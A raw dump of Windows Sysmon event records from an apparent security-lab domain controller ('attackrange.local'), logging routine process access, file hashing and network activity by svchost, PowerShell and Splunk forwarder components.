12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+ca3e|c:\windows\system32\rpcss.dll+ba7a|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010085Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.378{266CAFBE-646C-6064-0D00-00000000AE01}612468C:\Windows\system32\svchost.exe{266CAFBE-64D3-6064-B600-00000000AE01}5544C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000010084Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:47.347{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=7067F4A98228DC8B8957DC46C9FFF99B,SHA256=FA7211514DADCF761BB65320E1C698ED14436801E0A817F59AE7345E083EBCD1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010122Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:48.878{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010121Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:48.862{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FE38AC900C40D5714F548AC011B60985,SHA256=6E2D688FBDA4499DC234F042FEC932F9A783E813B52E9764E351B4ED4779F6CB,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010120Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:46.587{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53673-false10.0.1.12-8000- 23542300x800000000000000010123Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:49.940{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C0F7FFFC943DE2B3DC95DA8E52B51BB3,SHA256=487E14698959B5EB37C40E08594BC15DB541AE1E1CD9799602D171AEC89B6071,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010125Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:50.955{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1F5297EE76F6505E3026EBF47DD3ACC,SHA256=DAEE3C9CC177986703DD776B92FAF62A00F50F8C19C9025352A5F500E256C6AC,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010124Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:49.243{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53674-false10.0.1.12-8089- 23542300x800000000000000010129Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.971{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C02F3CC0E8773B008A41E9C6D1CC84C,SHA256=F0EE6CD0672A08D10F46DE2204C49180291538DE1B5232B8AC9D109ECFA4C6BC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010128Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:51.393{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_lmgxl1tf.ev3.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010127Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.393{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_14wxw500.v2k.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000010126Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:51.393{266CAFBE-65AB-6064-5001-00000000AE01}2456C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_14wxw500.v2k.ps12021-03-31 12:06:51.393 23542300x800000000000000010130Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:52.299{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=C6C6036DD8B9E748C1B6E704C6918876,SHA256=F4180F053039FDB987C2ED11A59D84633B60E430A79AC70583CFFDD12D6E1A30,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010133Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:52.540{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT 
AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53675-false10.0.1.12-8000- 23542300x800000000000000010132Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:53.486{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=78CBA53FCBC5F0364F4CCB69B78D6175,SHA256=D9D39013F7239E3D84CC185D1FEEDC4B8185906330405C5B55924684DFBEB320,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010131Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:53.064{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6C6BF97602E33B700EC58D74214C7172,SHA256=D87ED6ED180C510701B2D7A34676A9D923B8D14765308E35C352241DAA807834,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010135Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:54.501{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85E3FEB85393E8F4BBE7D606F91CC83A,SHA256=9D557A178537255783BB5F9183B6258F7E78A051E911C51EBD8FE504D6C1C73E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010134Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:54.142{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F8DEC284A9456956A72DE146C05FC54D,SHA256=4248477A1D28BBE3F81C17138B4928A118B8B007D0D37FEC4B4BB0B5F69CF136,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010136Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:55.204{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCB21D78BEFBDE789B0E013D0AF49483,SHA256=3FDDF9AA89396863369318850AB5926837AAEFFD67C543DE891E0C2F63F81D84,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010137Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:56.219{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A893BE26D2A4A05015A767F9C6D0E98D,SHA256=D8A0B6BBD824C816819DC815CC1B1CC49CEFC15ED6797DFCC71D961F001CB1B9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010138Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:57.235{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=096743BC63ADC3704C0643E11AF4CAFE,SHA256=09B5928AA98A2D8E4EC4BB34AE61B4253DB8F0FB4A6F188915E39C3DFE30FBBE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010140Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:06:58.422{266CAFBE-65AB-6064-5001-00000000AE01}2456ATTACKRANGE\AdministratorC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheMD5=61F76BFEDDC4BC7370E4A5A5F8B999BB,SHA256=2F5F4F1286A963A44D6182A39D98DC258AC9FAC638E02164495BFE872DB39572,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010139Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:58.250{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D7920FE61E0DE8CD874BC0BADE1E956,SHA256=271FF5E93B222B7A7D86516A0458575717C50F48455D5D9083A7BF4E10B0171D,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000010142Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:58.477{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53676-false10.0.1.12-8000- 23542300x800000000000000010141Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:06:59.344{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A376E2935D6FFD3173EC87E941B5E050,SHA256=ABA5AF6892C7A3A674C6246DC227C05FCE2FC24E5C059232E9941E2B8DB01AEC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010143Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:00.359{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=014B3DFDFAE0DEBF74AB70821EB1403F,SHA256=BB61415CC8A2614193BBDEA543B04AE4F681CB839DE636D8EC0F67EC8F50D2E5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000010144Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:01.374{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A620BEDA81202DC42F57A48C3DE6E54,SHA256=64A3058D2C4710D1164CE2B69F6B0E167F372A6E8B0D48E73759911E5CE43997,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000010152Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010151Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010150Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010149Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:02.983{266CAFBE-646C-6064-0C00-00000000AE01}592708C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010148Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x800000000000000010147Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.983{266CAFBE-64ED-6064-D500-00000000AE01}56481476C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x800000000000000010146Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.984{266CAFBE-65E6-6064-5701-00000000AE01}4324C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000010145Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:02.374{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED9BCE2F73781AC7FEDD64DE16E6489F,SHA256=21E2C2CBF8A1756ACDBD8713B7F1EA933ABCA3E6749F8BF8B3C799F46DD9902B,IMPHASH=00000000000000000000000000000000falsetrue 
10341000x800000000000000010163Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.936{266CAFBE-65E7-6064-5801-00000000AE01}55367020C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010162Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-65E7-6064-5801-00000000AE01}5536C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010161Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010160Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:07:03.764{266CAFBE-646C-6064-0C00-00000000AE01}5921096C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000010159Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
